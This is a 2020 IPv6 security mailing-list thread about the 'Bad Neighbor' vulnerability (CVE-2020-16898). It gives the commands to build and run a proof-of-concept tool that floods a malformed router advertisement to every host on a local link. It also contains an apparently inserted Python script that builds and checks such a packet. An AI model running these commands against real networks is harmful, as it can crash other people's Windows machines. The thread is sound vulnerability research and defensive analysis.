[ipv6hackers] CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)


Fernando Gont

Oct 14, 2020, 12:57:48 PM
to IPv6 Hackers Mailing List
Folks,

You may be aware of CVE-2020-16898. If not, now you are :-) :
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/

I've produced a PoC for the aforementioned vulnerability according to the
description on the McAfee site, but somehow I seem to fail to trigger
the "Blue Screen Of Death" when trying the attack against my local MS
Windows 10 installation.

FWIW, the packet I'm sending can be downloaded (pcap) here:
https://www.gont.com.ar/pcaps/bad-neighbor.pcap

The packet can be crafted with the ra6 tool of the SI6 toolkit present
in the "nd-opt-fuzzing" branch of the github repo
(https://github.com/fgont/ipv6toolkit). That is,

git clone https://github.com/fgont/ipv6toolkit.git
cd ipv6toolkit
git checkout nd-opt-fuzzing
sudo make install


And then run the ra6 tool as:

sudo ra6 -i INTERFACE --bad-neighbor -d ff02::1 -v -e


Note that this will target all nodes on the local link of the INTERFACE
interface. You may set the "-d" option to a unicast address if you want
to target a single system.

I'll keep looking further into this issue and report back to the group
if I find anything.

If you do play with the tool and test the PoC, please do let me/us know.

Thanks!

Regards,
--
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492




_______________________________________________
Ipv6hackers mailing list
Ipv6h...@lists.si6networks.com
https://lists.si6networks.com/mailman/listinfo/ipv6hackers

Marc Heuse

Oct 14, 2020, 1:07:14 PM
to IPv6 Hackers Mailing List
Everywhere it's classified as remote and wormable - but I would expect it to only work on the local LAN due to hop count security.
When you get it working please test if it is the case ... thanks!

Gert Doering

Oct 14, 2020, 1:42:54 PM
to IPv6 Hackers Mailing List
Hi,

On Wed, Oct 14, 2020 at 07:06:19PM +0200, Marc Heuse wrote:
> Everywhere it's classified as remote and wormable - but I would expect it to only work on the local LAN due to hop count security.

This assumes that Windows does the (required...) HopCount=255 check
on reception.

Given that other OSes have been found to neglect this check in the past, I
wouldn't bet my Windows VMs on this...

Gert Doering
-- NetMaster
--
have you enabled IPv6 on something today...?

SpaceNet AG, Joseph-Dollinger-Bogen 14, D-80807 Muenchen, Tel: +49 (0)89/32356-444
Vorstand: Sebastian v. Bomhard, Michael Emmer
Aufsichtsratsvors.: A. Grundner-Culemann
HRB: 136055 (AG Muenchen), USt-IdNr.: DE813185279
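As an added example (not code from this thread, from the SI6 toolkit or from the ra6 PoC), the script below builds a Router Advertisement carrying an RDNSS option and applies, on the receiving side, the two checks this thread turns on: the Hop Limit = 255 test of RFC 4861 section 6.1.2 that Gert mentions, and the RFC 8106 rule that an RDNSS option's Length field be odd and at least 3, which the McAfee write-up names as the malformed condition behind CVE-2020-16898 (an even Length). The source/destination addresses and the DNS server addresses are constructed for illustration; the script does not reproduce the Windows stack's behaviour, it only shows how a conforming parser rejects such a packet and why an even Length desynchronises option parsing.

```python
"""Build and sanity-check IPv6 Router Advertisements carrying an RDNSS option.

Added example for the CVE-2020-16898 thread; not the ra6 PoC and not the
Windows parser. Addresses below are constructed from documentation space.
"""
import ipaddress
import struct

ICMPV6_ROUTER_ADVERTISEMENT = 134   # RFC 4861 section 4.2
ND_OPT_RDNSS = 25                   # RFC 8106 section 5.1
ND_HOP_LIMIT = 255                  # RFC 4861 section 6.1.2: RAs must arrive with Hop Limit 255
RA_HEADER_LEN = 16


def icmpv6_checksum(src, dst, payload):
    """ICMPv6 checksum over the IPv6 pseudo-header (RFC 8200 section 8.1)."""
    pseudo = (ipaddress.IPv6Address(src).packed
              + ipaddress.IPv6Address(dst).packed
              + struct.pack("!I", len(payload))
              + b"\x00\x00\x00\x3a")           # zeros + Next Header = 58 (ICMPv6)
    data = pseudo + payload
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def rdnss_option(addresses, lifetime=3600, length=None):
    """RDNSS option: Type 25, Length (8-octet units), Reserved, Lifetime, addresses.

    RFC 8106 fixes Length at 1 + 2*N for N addresses, so it is odd and >= 3.
    `length` lets the caller override it to build a malformed option."""
    body = b"\x00\x00" + struct.pack("!I", lifetime)
    body += b"".join(ipaddress.IPv6Address(a).packed for a in addresses)
    if length is None:
        length = 1 + 2 * len(addresses)
    return struct.pack("!BB", ND_OPT_RDNSS, length) + body


def router_advertisement(src, dst, options, cur_hop_limit=64, router_lifetime=1800):
    """ICMPv6 RA (type 134) with a valid checksum and the given ND options."""
    hdr = struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERTISEMENT, 0, 0,
                      cur_hop_limit, 0, router_lifetime, 0, 0)
    body = hdr + b"".join(options)
    csum = icmpv6_checksum(src, dst, body)
    return body[:2] + struct.pack("!H", csum) + body[4:]


def validate_ra(hop_limit, src, dst, packet):
    """Return the reasons a receiver should discard this RA; [] means accept.

    hop_limit is the Hop Limit field of the enclosing IPv6 header."""
    problems = []
    if hop_limit != ND_HOP_LIMIT:
        problems.append("IPv6 Hop Limit %d != 255: not from an on-link sender" % hop_limit)
    if len(packet) < RA_HEADER_LEN or packet[0] != ICMPV6_ROUTER_ADVERTISEMENT or packet[1] != 0:
        return problems + ["not a Router Advertisement"]
    zeroed = packet[:2] + b"\x00\x00" + packet[4:]
    if icmpv6_checksum(src, dst, zeroed) != struct.unpack("!H", packet[2:4])[0]:
        problems.append("bad ICMPv6 checksum")
    off = RA_HEADER_LEN
    while off < len(packet):
        if off + 2 > len(packet):
            problems.append("truncated option header at offset %d" % off)
            break
        otype, olen = packet[off], packet[off + 1]
        if olen == 0:                                   # RFC 4861 section 4.6
            problems.append("option type %d at offset %d has zero Length" % (otype, off))
            break
        if otype == ND_OPT_RDNSS and (olen < 3 or olen % 2 == 0):
            problems.append("RDNSS Length %d is not odd and >= 3" % olen)
        if off + olen * 8 > len(packet):
            problems.append("option type %d runs past the end of the packet" % otype)
            break
        off += olen * 8                                 # trust Length only after the checks above
    return problems


# Constructed sample traffic: link-local router, all-nodes multicast (as in ra6 -d ff02::1).
SRC = "fe80::1"
DST = "ff02::1"
DNS = ["2001:db8::1", "2001:db8::2"]


def good_ra():
    return router_advertisement(SRC, DST, [rdnss_option(DNS)])


def bad_neighbor_style_ra():
    """Same RA, but the RDNSS Length is forced even (4 instead of 5): a parser
    that trusts it lands mid-address and reads the next 'option' from there."""
    return router_advertisement(SRC, DST, [rdnss_option(DNS, length=4)])


if __name__ == "__main__":
    print("good, hop 255:", validate_ra(255, SRC, DST, good_ra()))
    print("good, hop 64: ", validate_ra(64, SRC, DST, good_ra()))
    print("even Length:  ", validate_ra(255, SRC, DST, bad_neighbor_style_ra()))
```

The third case is the instructive one: with Length forced to 4 the validator flags the parity violation, then, because the loop advanced by 4*8 octets as a trusting parser would, finds itself eight bytes into the second DNS address and reports a zero-Length "option" there. A parser without the parity and zero-Length checks would keep walking attacker-controlled bytes as option headers, which is the kind of desynchronisation a malformed RDNSS option produces.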

Fernando Gont

Oct 14, 2020, 1:44:17 PM
to IPv6 Hackers Mailing List, Marc Heuse
Hi, Marc,

On 14/10/20 14:06, Marc Heuse wrote:
> Everywhere it's classified as remote and wormable - but I would expect it to only work on the local LAN due to hop count security.

I agree with this, except for cases where e.g. ISATAP is employed:
for instance, ISATAP relies on RAs that traverse multiple links tunneled
in IPv4 packets.


> When you get it working please test if it is the case ... thanks!

Once I figure out how to trigger the "blue screen", I will extend the
testing to e.g. attacks on ISATAP tunnels.

Will then report back to the group.

Thanks!

Regards,
--
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492

Fernando Gont

Oct 14, 2020, 2:20:54 PM
to IPv6 Hackers Mailing List, Gert Doering
Hi, Gert,

On 14/10/20 14:42, Gert Doering wrote:
> Hi,
>
> On Wed, Oct 14, 2020 at 07:06:19PM +0200, Marc Heuse wrote:
>> Everywhere it's classified as remote and wormable - but I would expect it to only work on the local LAN due to hop count security.
>
> This assumes that Windows does the (required...) HopCount=255 check
> on reception.
>
> Given that other OSes have been found to neglect this check in the past, I
> wouldn't bet my Windows VMs on this...

The general-purpose OSes I have tested (*BSD, Linux, MS Windows) seemed
to do the Hop Limit check. In this case, since this is an
implementation-dependent vulnerability, I'd guess it's mostly Windows
that matters, though.

Thanks,
--
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492